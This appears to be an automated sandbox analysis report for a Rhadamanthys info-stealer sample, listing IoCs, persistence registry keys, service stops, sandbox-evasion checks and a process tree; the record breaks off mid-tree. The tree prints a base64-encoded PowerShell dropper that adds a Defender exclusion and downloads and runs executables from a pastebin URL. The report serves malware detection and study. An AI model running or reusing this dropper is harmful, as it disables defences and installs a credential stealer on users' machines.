rhadamanthys | hxxps://playit[.]gg

Resubmissions

17-07-2023 10:06

230717-l5ap3sbh9s 8

16-07-2023 21:42

230716-1kr6ysgg98 10

16-07-2023 21:17

230716-z49dxahf31 10

Analysis

max time kernel
92s
max time network
176s
platform
windows10-2004_x64
resource
win10v2004-20230703-en
resource tags

arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
submitted
16-07-2023 21:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://playit.gg

Score

10^/10

rhadamanthys evasion persistence stealer

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

https://pastebin.com/raw/zaCgrR02

Signatures

Detect rhadamanthys stealer shellcode 6 IoCs

resource	yara_rule
behavioral1/memory/4208-941-0x00000000021A0000-0x00000000025A0000-memory.dmp	family_rhadamanthys
behavioral1/memory/4208-942-0x00000000021A0000-0x00000000025A0000-memory.dmp	family_rhadamanthys
behavioral1/memory/4208-943-0x00000000021A0000-0x00000000025A0000-memory.dmp	family_rhadamanthys
behavioral1/memory/4208-944-0x00000000021A0000-0x00000000025A0000-memory.dmp	family_rhadamanthys
behavioral1/memory/4692-951-0x0000000002370000-0x0000000002770000-memory.dmp	family_rhadamanthys
behavioral1/memory/4692-952-0x0000000002370000-0x0000000002770000-memory.dmp	family_rhadamanthys

Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
stealer rhadamanthys

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

description	pid	Process	procid_target
PID 2068 created 3252	2068	2ptnm12m.4gm1.exe	1023
PID 5048 created 3252	5048	smss.exe	1023

Blocklisted process makes network request 4 IoCs

flow	pid	Process
134	1992	powershell.exe
135	3792	powershell.exe
137	1992	powershell.exe
138	3792	powershell.exe

Downloads MZ/PE file
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Executes dropped EXE 8 IoCs

pid	Process
856	smss.exe
2068	2ptnm12m.4gm1.exe
4208	smss.exe
3628	smss.exe
4840	smss.exe
5048	smss.exe
4692	ldkh2x5b.54y2.exe
4160	ldkh2x5b.54y3.exe

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Software\Microsoft\Windows\CurrentVersion\Run	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Software\Microsoft\Windows\CurrentVersion\Run	smss.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsHostProcessor = "\"C:\\Users\\Admin\\AppData\\Roaming\\WindowsHostProcessor\\WindowsHostProcessor.exe\" "	smss.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Launches sc.exe 10 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
224	sc.exe
1616	sc.exe
4076	sc.exe
3848	sc.exe
3864	sc.exe
1444	sc.exe
1584	sc.exe
3200	sc.exe
5028	sc.exe
1724	sc.exe

Program crash 4 IoCs

pid	pid_target	Process	procid_target
2388	632	WerFault.exe	4
3244	688	WerFault.exe	2
4948	3616	WerFault.exe	58
2388	4956	WerFault.exe	44

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	Process not Found
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	Process not Found

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133340174050169021"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings	chrome.exe

Suspicious behavior: EnumeratesProcesses 34 IoCs

pid	Process
4320	chrome.exe
4320	chrome.exe
1992	powershell.exe
1992	powershell.exe
1992	powershell.exe
3792	powershell.exe
3792	powershell.exe
3792	powershell.exe
696	taskmgr.exe
696	taskmgr.exe
696	Process not Found
696	Process not Found
696	Process not Found
696	Process not Found
696	Process not Found
696	Process not Found
696	Process not Found
696	Process not Found
696	Process not Found
696	Process not Found
696	Process not Found
2068	2ptnm12m.4gm1.exe
2068	2ptnm12m.4gm1.exe
4208	smss.exe
4208	smss.exe
4124	Process not Found
4124	Process not Found
696	Process not Found
4692	ldkh2x5b.54y2.exe
4692	ldkh2x5b.54y2.exe
5048	smss.exe
5048	smss.exe
4124	Process not Found
696	Process not Found

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

pid	Process
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	4320	chrome.exe
Token: SeCreatePagefilePrivilege	4320	chrome.exe
Token: SeShutdownPrivilege	4320	chrome.exe
Token: SeCreatePagefilePrivilege	4320	chrome.exe
Token: SeShutdownPrivilege	4320	chrome.exe
Token: SeCreatePagefilePrivilege	4320	chrome.exe
Token: SeShutdownPrivilege	4320	chrome.exe
Token: SeCreatePagefilePrivilege	4320	chrome.exe
Token: SeShutdownPrivilege	4320	chrome.exe
Token: SeCreatePagefilePrivilege	4320	chrome.exe
Token: SeShutdownPrivilege	4320	chrome.exe
Token: SeCreatePagefilePrivilege	4320	chrome.exe
Token: SeShutdownPrivilege	4320	chrome.exe
Token: SeCreatePagefilePrivilege	4320	chrome.exe
Token: SeShutdownPrivilege	4320	chrome.exe
Token: SeCreatePagefilePrivilege	4320	chrome.exe
Token: SeShutdownPrivilege	4320	chrome.exe
Token: SeCreatePagefilePrivilege	4320	chrome.exe
Token: SeShutdownPrivilege	4320	chrome.exe
Token: SeCreatePagefilePrivilege	4320	chrome.exe
Token: SeShutdownPrivilege	4320	chrome.exe
Token: SeCreatePagefilePrivilege	4320	chrome.exe
Token: SeShutdownPrivilege	4320	chrome.exe
Token: SeCreatePagefilePrivilege	4320	chrome.exe
Token: SeShutdownPrivilege	4320	chrome.exe
Token: SeCreatePagefilePrivilege	4320	chrome.exe
Token: SeShutdownPrivilege	4320	chrome.exe
Token: SeCreatePagefilePrivilege	4320	chrome.exe
Token: SeShutdownPrivilege	4320	chrome.exe
Token: SeCreatePagefilePrivilege	4320	chrome.exe
Token: SeShutdownPrivilege	4320	chrome.exe
Token: SeCreatePagefilePrivilege	4320	chrome.exe
Token: SeShutdownPrivilege	4320	chrome.exe
Token: SeCreatePagefilePrivilege	4320	chrome.exe
Token: SeShutdownPrivilege	4320	chrome.exe
Token: SeCreatePagefilePrivilege	4320	chrome.exe
Token: SeShutdownPrivilege	4320	chrome.exe
Token: SeCreatePagefilePrivilege	4320	chrome.exe
Token: SeShutdownPrivilege	4320	chrome.exe
Token: SeCreatePagefilePrivilege	4320	chrome.exe
Token: SeShutdownPrivilege	4320	chrome.exe
Token: SeCreatePagefilePrivilege	4320	chrome.exe
Token: SeShutdownPrivilege	4320	chrome.exe
Token: SeCreatePagefilePrivilege	4320	chrome.exe
Token: SeShutdownPrivilege	4320	chrome.exe
Token: SeCreatePagefilePrivilege	4320	chrome.exe
Token: SeShutdownPrivilege	4320	chrome.exe
Token: SeCreatePagefilePrivilege	4320	chrome.exe
Token: SeShutdownPrivilege	4320	chrome.exe
Token: SeCreatePagefilePrivilege	4320	chrome.exe
Token: SeShutdownPrivilege	4320	chrome.exe
Token: SeCreatePagefilePrivilege	4320	chrome.exe
Token: SeShutdownPrivilege	4320	chrome.exe
Token: SeCreatePagefilePrivilege	4320	chrome.exe
Token: SeShutdownPrivilege	4320	chrome.exe
Token: SeCreatePagefilePrivilege	4320	chrome.exe
Token: SeShutdownPrivilege	4320	chrome.exe
Token: SeCreatePagefilePrivilege	4320	chrome.exe
Token: SeShutdownPrivilege	4320	chrome.exe
Token: SeCreatePagefilePrivilege	4320	chrome.exe
Token: SeShutdownPrivilege	4320	chrome.exe
Token: SeCreatePagefilePrivilege	4320	chrome.exe
Token: SeShutdownPrivilege	4320	chrome.exe
Token: SeCreatePagefilePrivilege	4320	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
696	taskmgr.exe
696	taskmgr.exe
696	taskmgr.exe
696	taskmgr.exe
696	taskmgr.exe
696	taskmgr.exe
696	taskmgr.exe
696	taskmgr.exe
696	taskmgr.exe
696	taskmgr.exe
696	taskmgr.exe
696	taskmgr.exe
696	taskmgr.exe
696	Process not Found
696	Process not Found

Suspicious use of SendNotifyMessage 58 IoCs

pid	Process
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
696	taskmgr.exe
696	taskmgr.exe
696	taskmgr.exe
696	taskmgr.exe
696	taskmgr.exe
696	taskmgr.exe
696	taskmgr.exe
696	taskmgr.exe
696	taskmgr.exe
696	taskmgr.exe
696	taskmgr.exe
696	taskmgr.exe
696	taskmgr.exe
696	Process not Found
696	Process not Found
696	Process not Found
696	Process not Found
696	Process not Found
696	Process not Found
696	Process not Found
696	Process not Found
696	Process not Found
696	Process not Found
696	Process not Found

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
3240	AtlsWare.exe
1644	AtlsWare.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4320 wrote to memory of 1976	4320	chrome.exe	85
PID 4320 wrote to memory of 1976	4320	chrome.exe	85
PID 4320 wrote to memory of 2208	4320	chrome.exe	87
PID 4320 wrote to memory of 2208	4320	chrome.exe	87
PID 4320 wrote to memory of 2208	4320	chrome.exe	87
PID 4320 wrote to memory of 2208	4320	chrome.exe	87
PID 4320 wrote to memory of 2208	4320	chrome.exe	87
PID 4320 wrote to memory of 2208	4320	chrome.exe	87
PID 4320 wrote to memory of 2208	4320	chrome.exe	87
PID 4320 wrote to memory of 2208	4320	chrome.exe	87
PID 4320 wrote to memory of 2208	4320	chrome.exe	87
PID 4320 wrote to memory of 2208	4320	chrome.exe	87
PID 4320 wrote to memory of 2208	4320	chrome.exe	87
PID 4320 wrote to memory of 2208	4320	chrome.exe	87
PID 4320 wrote to memory of 2208	4320	chrome.exe	87
PID 4320 wrote to memory of 2208	4320	chrome.exe	87
PID 4320 wrote to memory of 2208	4320	chrome.exe	87
PID 4320 wrote to memory of 2208	4320	chrome.exe	87
PID 4320 wrote to memory of 2208	4320	chrome.exe	87
PID 4320 wrote to memory of 2208	4320	chrome.exe	87
PID 4320 wrote to memory of 2208	4320	chrome.exe	87
PID 4320 wrote to memory of 2208	4320	chrome.exe	87
PID 4320 wrote to memory of 2208	4320	chrome.exe	87
PID 4320 wrote to memory of 2208	4320	chrome.exe	87
PID 4320 wrote to memory of 2208	4320	chrome.exe	87
PID 4320 wrote to memory of 2208	4320	chrome.exe	87
PID 4320 wrote to memory of 2208	4320	chrome.exe	87
PID 4320 wrote to memory of 2208	4320	chrome.exe	87
PID 4320 wrote to memory of 2208	4320	chrome.exe	87
PID 4320 wrote to memory of 2208	4320	chrome.exe	87
PID 4320 wrote to memory of 2208	4320	chrome.exe	87
PID 4320 wrote to memory of 2208	4320	chrome.exe	87
PID 4320 wrote to memory of 2208	4320	chrome.exe	87
PID 4320 wrote to memory of 2208	4320	chrome.exe	87
PID 4320 wrote to memory of 2208	4320	chrome.exe	87
PID 4320 wrote to memory of 2208	4320	chrome.exe	87
PID 4320 wrote to memory of 2208	4320	chrome.exe	87
PID 4320 wrote to memory of 2208	4320	chrome.exe	87
PID 4320 wrote to memory of 2208	4320	chrome.exe	87
PID 4320 wrote to memory of 2208	4320	chrome.exe	87
PID 4320 wrote to memory of 3748	4320	chrome.exe	88
PID 4320 wrote to memory of 3748	4320	chrome.exe	88
PID 4320 wrote to memory of 3292	4320	chrome.exe	89
PID 4320 wrote to memory of 3292	4320	chrome.exe	89
PID 4320 wrote to memory of 3292	4320	chrome.exe	89
PID 4320 wrote to memory of 3292	4320	chrome.exe	89
PID 4320 wrote to memory of 3292	4320	chrome.exe	89
PID 4320 wrote to memory of 3292	4320	chrome.exe	89
PID 4320 wrote to memory of 3292	4320	chrome.exe	89
PID 4320 wrote to memory of 3292	4320	chrome.exe	89
PID 4320 wrote to memory of 3292	4320	chrome.exe	89
PID 4320 wrote to memory of 3292	4320	chrome.exe	89
PID 4320 wrote to memory of 3292	4320	chrome.exe	89
PID 4320 wrote to memory of 3292	4320	chrome.exe	89
PID 4320 wrote to memory of 3292	4320	chrome.exe	89
PID 4320 wrote to memory of 3292	4320	chrome.exe	89
PID 4320 wrote to memory of 3292	4320	chrome.exe	89
PID 4320 wrote to memory of 3292	4320	chrome.exe	89
PID 4320 wrote to memory of 3292	4320	chrome.exe	89
PID 4320 wrote to memory of 3292	4320	chrome.exe	89
PID 4320 wrote to memory of 3292	4320	chrome.exe	89
PID 4320 wrote to memory of 3292	4320	chrome.exe	89
PID 4320 wrote to memory of 3292	4320	chrome.exe	89
PID 4320 wrote to memory of 3292	4320	chrome.exe	89

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://playit.gg
1⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4320
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff936a59758,0x7ff936a59768,0x7ff936a59778
  2⤵
  PID:1976
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1772 --field-trial-handle=1924,i,5548855196899379935,3782182783010604074,131072 /prefetch:2
  2⤵
  PID:2208
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 --field-trial-handle=1924,i,5548855196899379935,3782182783010604074,131072 /prefetch:8
  2⤵
  PID:3748
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2224 --field-trial-handle=1924,i,5548855196899379935,3782182783010604074,131072 /prefetch:8
  2⤵
  PID:3292
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3108 --field-trial-handle=1924,i,5548855196899379935,3782182783010604074,131072 /prefetch:1
  2⤵
  PID:1096
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3088 --field-trial-handle=1924,i,5548855196899379935,3782182783010604074,131072 /prefetch:1
  2⤵
  PID:2244
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4852 --field-trial-handle=1924,i,5548855196899379935,3782182783010604074,131072 /prefetch:1
  2⤵
  PID:4784
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=5096 --field-trial-handle=1924,i,5548855196899379935,3782182783010604074,131072 /prefetch:1
  2⤵
  PID:368
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5192 --field-trial-handle=1924,i,5548855196899379935,3782182783010604074,131072 /prefetch:8
  2⤵
  PID:1956
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5188 --field-trial-handle=1924,i,5548855196899379935,3782182783010604074,131072 /prefetch:8
  2⤵
  PID:880
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4016 --field-trial-handle=1924,i,5548855196899379935,3782182783010604074,131072 /prefetch:8
  2⤵
  PID:784
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5656 --field-trial-handle=1924,i,5548855196899379935,3782182783010604074,131072 /prefetch:8
  2⤵
  PID:1400
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=5544 --field-trial-handle=1924,i,5548855196899379935,3782182783010604074,131072 /prefetch:1
  2⤵
  PID:2092
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=5648 --field-trial-handle=1924,i,5548855196899379935,3782182783010604074,131072 /prefetch:1
  2⤵
  PID:2736
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=3148 --field-trial-handle=1924,i,5548855196899379935,3782182783010604074,131072 /prefetch:1
  2⤵
  PID:2704
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6212 --field-trial-handle=1924,i,5548855196899379935,3782182783010604074,131072 /prefetch:8
  2⤵
  PID:1376
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5880 --field-trial-handle=1924,i,5548855196899379935,3782182783010604074,131072 /prefetch:8
  2⤵
  PID:1616
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5416 --field-trial-handle=1924,i,5548855196899379935,3782182783010604074,131072 /prefetch:8
  2⤵
  PID:2260

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:1480

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3068

C:\Users\Admin\Desktop\AtlsWare.exe
"C:\Users\Admin\Desktop\AtlsWare.exe"
1⤵
- Suspicious use of SetWindowsHookEx
PID:3240
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAaQBuACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbgBoAGsAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcAB4AGkAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYQBxAGwAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcABhAHMAdABlAGIAaQBuAC4AYwBvAG0ALwByAGEAdwAvAHoAYQBDAGcAcgBSADAAMgAnACkALgBTAHAAbABpAHQAKABbAHMAdAByAGkAbgBnAFsAXQBdACIAYAByAGAAbgAiACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AE4AbwBuAGUAKQA7ACAAJABmAG4AIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAUgBhAG4AZABvAG0ARgBpAGwAZQBOAGEAbQBlACgAKQA7ACAAZgBvAHIAIAAoACQAaQA9ADAAOwAgACQAaQAgAC0AbAB0ACAAJABsAG4AawAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwArACkAIAB7ACAAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAbABuAGsAWwAkAGkAXQAsACAAPAAjAHEAZgBjACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAeQB6AHIAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaQB5AGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACgAJABmAG4AIAArACAAJABpAC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAnAC4AZQB4AGUAJwApACkAKQAgAH0APAAjAHEAZQBxACMAPgA7ACAAZgBvAHIAIAAoACQAaQA9ADAAOwAgACQAaQAgAC0AbAB0ACAAJABsAG4AawAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwArACkAIAB7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHQAaABpACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB0AGcAYgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQAgAH0AIAA8ACMAagBjAHUAIwA+AA=="
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  PID:1992
- - C:\Users\Admin\AppData\Local\Temp\2ptnm12m.4gm0.exe
    "C:\Users\Admin\AppData\Local\Temp\2ptnm12m.4gm0.exe"
    3⤵
    PID:856
- - C:\Users\Admin\AppData\Local\Temp\2ptnm12m.4gm1.exe
    "C:\Users\Admin\AppData\Local\Temp\2ptnm12m.4gm1.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:2068
- - C:\Users\Admin\AppData\Local\Temp\2ptnm12m.4gm2.exe
    "C:\Users\Admin\AppData\Local\Temp\2ptnm12m.4gm2.exe"
    3⤵
    PID:4208
- - C:\Users\Admin\AppData\Local\Temp\2ptnm12m.4gm3.exe
    "C:\Users\Admin\AppData\Local\Temp\2ptnm12m.4gm3.exe"
    3⤵
    PID:4840

C:\Users\Admin\Desktop\AtlsWare.exe
"C:\Users\Admin\Desktop\AtlsWare.exe"
1⤵
- Suspicious use of SetWindowsHookEx
PID:1644
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
